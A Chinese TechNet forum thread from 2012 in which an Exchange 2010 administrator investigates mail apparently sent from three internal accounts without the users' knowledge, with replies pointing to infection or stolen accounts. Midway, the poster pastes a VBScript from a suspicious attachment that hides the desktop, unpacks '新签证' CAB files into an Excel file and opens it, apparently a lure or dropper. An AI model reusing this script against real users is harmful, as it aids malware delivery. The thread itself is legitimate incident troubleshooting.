none
Exchange 2010 用户说有人冒名发邮件 RRS feed

  • 问题

  • 用户告知没有发送邮件

    OUTLOOK和WEB的发件箱也没有这份邮件。

    但是邮件服务器的邮件跟踪里头有这份邮件 

     

    有没有什么办法知道这份邮件是从哪里发出的?

    或者有没有什么办法防止这种情况。

    2012年11月5日 2:21

答案

  •  毫无疑问可能是中毒的原因!

    技术超级500人群:66140619 第三波(Acer)上海分公司招聘技术: ------------------------------------- 熟悉一门或者多门微软技术、个性鲜明并能够主动处理问题,客户沟通能力良好! 一年14薪左右、年度TechED(依据实际表现),免费参加微软各类技术培训。 工作职责:提供客户 Daily Support & On-site support,与技术主管及Partner合作达成项目工总目标! 详情加群交流!

    • 已标记为答案 cara chen 2012年11月13日 9:25
    2012年11月6日 3:26
    版主

全部回复

  • 如果发送者是内部用户(Outlook里双击能打开用户的属性页)的话,应该是无法冒名发送的,除非冒充者能够登录发送者的账户。顺便说一下,发送完之后,可以从发件箱里删除的。

    2012年11月5日 15:01
  • 会不会 , grant 了 send-as?

    2012年11月6日 2:02
  • 确定是内部用户的。 (Outlook里双击能打开用户的属性页)

    而且发送内容是有附带一些.cab文件。

    发件内容不像是程序自动生成。 像是人为写的。 

    内容也不像用户自己发送的。 

    2012年11月6日 2:02
  • SEND as ? 是在安全选项里头添加的那个么?这个没有做过。  
    2012年11月6日 2:09
  • 附件里头包含了一个vbs .:

    Dim oexcel,owb, WshShell,Fso,Atta_xls,sh,route
    On error Resume Next
    Set sh=WScript.CreateObject("shell.application")
    sh.MinimizeAll
    Set sh = Nothing
    Set Fso = CreateObject("Scripting.FileSystemObject")
    Set WshShell = WScript.CreateObject("WScript.Shell")
    If Fso.Folderexists("E:\KK") = False Then Fso.CreateFolder "E:\KK"
    Fso.CopyFile  _
    WshShell.CurrentDirectory & "\新签证*.CAB", "E:\KK\", True
    For Each Atta_xls In ListDir("E:\KK")
       WshShell.Run "expand " & Atta_xls & " -F:新签证.xls E:\KK", 0, true
    Next
    If Fso.FileExists("E:\KK\新签证.xls") = 0 then
            route = WshShell.CurrentDirectory & "\新签证.xls"
            if Fso.FileExists(WshShell.CurrentDirectory & "\新签证.xls")=0 then
                     route = InputBox("Warning! " & Chr(10) & "You are going to open a confidential file."& Chr(10)   _
                                   & "Please input the complete file path." & Chr(10) & "ex. C:\parth\confidential_file.xls", _
                                   "Open a File" , "Please Input the Complete File Path", 10000, 8500)
            End if
    else
            route = "E:\KK\新签证.xls"
    End If
       set oexcel=createobject("excel.application")
       set owb=oexcel.workbooks.open(route)
       oExcel.Visible = True
    Set oExcel = Nothing
    Set oWb = Nothing
    Set  WshShell = Nothing
    Set Fso = Nothing
    WScript.Quit
    Private Function ListDir (ByVal Path)
       Dim Filter, a, n, Folder, Files, File
           ReDim a(10)
        n = 0
      Set Folder = fso.GetFolder(Path)
       Set Files = Folder.Files
       For Each File In Files
          If left(File.Name,3) = "新签证" and right(File.Name,3) = "CAB" Then
             If n > UBound(a) Then ReDim Preserve a(n*2)
                a(n) = File.Path
                n = n + 1
           End If
       Next
       ReDim Preserve a(n-1)
       ListDir = a
    End Function

    2012年11月6日 2:15
  • 您好!

    1.请将Message tracking的结果post至论坛。

    2.去掉附件再发一次看看结果如何?

    3.请检查其他文件夹中是否存在该邮件。


    Cara Chen

    TechNet Community Support


    2012年11月6日 2:24
  • 1.用户本身的OUTLOOK和OWA里头没有这封邮件。 收件人收到了这封邮件。

    2.附件证实是用户本身电脑中的文件。

    3.在用户OUTLOOK恢复删除邮件里头也没有这封邮件。

    #TYPE Microsoft.Exchange.Management.TransportLogSearchTasks.MessageTrackingEvent
    PSComputerName RunspaceId Timestamp ClientIp ClientHostname ServerIp ServerHostname SourceContext ConnectorId Source EventId InternalMessageId MessageId Recipients RecipientStatus TotalBytes RecipientCount RelatedRecipientAddress Reference MessageSubject Sender ReturnPath MessageInfo MessageLatency MessageLatencyType EventData
    zg-ex01.test.com bc3087ce-4e8e-4fd4-869d-274307fbeb81 2012-11-6 09:40 ::1 ZG-EX01.test.com ::1 ZG-Ex01 08CF897350162536 STOREDRIVER RECEIVE 18 <6E4F94FBDFC4814FBA67F396210497CA29014230@ZG-Ex01.test.com> System.String[] System.String[] 213130 4 ??? dongxd@test.com dongxd@test.com 04I:  None System.Collections.Generic.KeyValuePair`2[System.String,System.Object][]
    zg-ex01.test.com bc3087ce-4e8e-4fd4-869d-274307fbeb81 2012-11-6 09:40 ZG-Ex01 ZG-EX01 08CF897350162538;2012-11-06T01:40:04.505Z;0 STOREDRIVER DELIVER 18 <6E4F94FBDFC4814FBA67F396210497CA29014230@ZG-Ex01.test.com> System.String[] System.String[] 213308 4 ??? dongxd@test.com dongxd@test.com 2012-11-06T01:40:03.367Z;SRV=ZG-EX01.test.com:TOTAL=0;SRV=ZG-EX01.test.com:TOTAL=0 00:01.8 EndToEnd System.Collections.Generic.KeyValuePair`2[System.String,System.Object][]
    zg-ex01.test.com bc3087ce-4e8e-4fd4-869d-274307fbeb81 2012-11-6 09:40 ::1 ZG-EX01 ZG-EX01 MDB:491e21de-72ef-47ac-981c-ac9ca77c2cdf, Mailbox:600f54a9-60bf-4be8-a7fc-d4d8cbd325dc, Event:1048026, MessageClass:IPM.Note, CreationTime:2012-11-06T01:40:03.367Z, ClientType:MOMT STOREDRIVER SUBMIT <6E4F94FBDFC4814FBA67F396210497CA29014230@ZG-Ex01.test.com> System.String[] System.String[] ??? dongxd@test.com 2012-11-06T01:40:03.367Z;LSRV=ZG-EX01.test.com:TOTAL=1 00:01.1 LocalServer System.Collections.Generic.KeyValuePair`2[System.String,System.Object][]

    2012年11月6日 2:44
  •  毫无疑问可能是中毒的原因!

    技术超级500人群:66140619 第三波(Acer)上海分公司招聘技术: ------------------------------------- 熟悉一门或者多门微软技术、个性鲜明并能够主动处理问题,客户沟通能力良好! 一年14薪左右、年度TechED(依据实际表现),免费参加微软各类技术培训。 工作职责:提供客户 Daily Support & On-site support,与技术主管及Partner合作达成项目工总目标! 详情加群交流!

    • 已标记为答案 cara chen 2012年11月13日 9:25
    2012年11月6日 3:26
    版主
  • 是客户端中毒还是服务器中毒? 

    2012年11月6日 3:28
  • 您好!

    其他用户有没有这养的情况,若没有,说明该用户账号可能被盗。


    Cara Chen

    TechNet Community Support

    2012年11月6日 7:54
  • 目前有3个账号出现这样的情况。 

    而且这三份邮件的收件人基本相同。 


    2012年11月6日 12:11
  • 您好!

    这很可能是你的这3个用户账号被盗了。


    Cara Chen

    TechNet Community Support

    2012年11月8日 7:05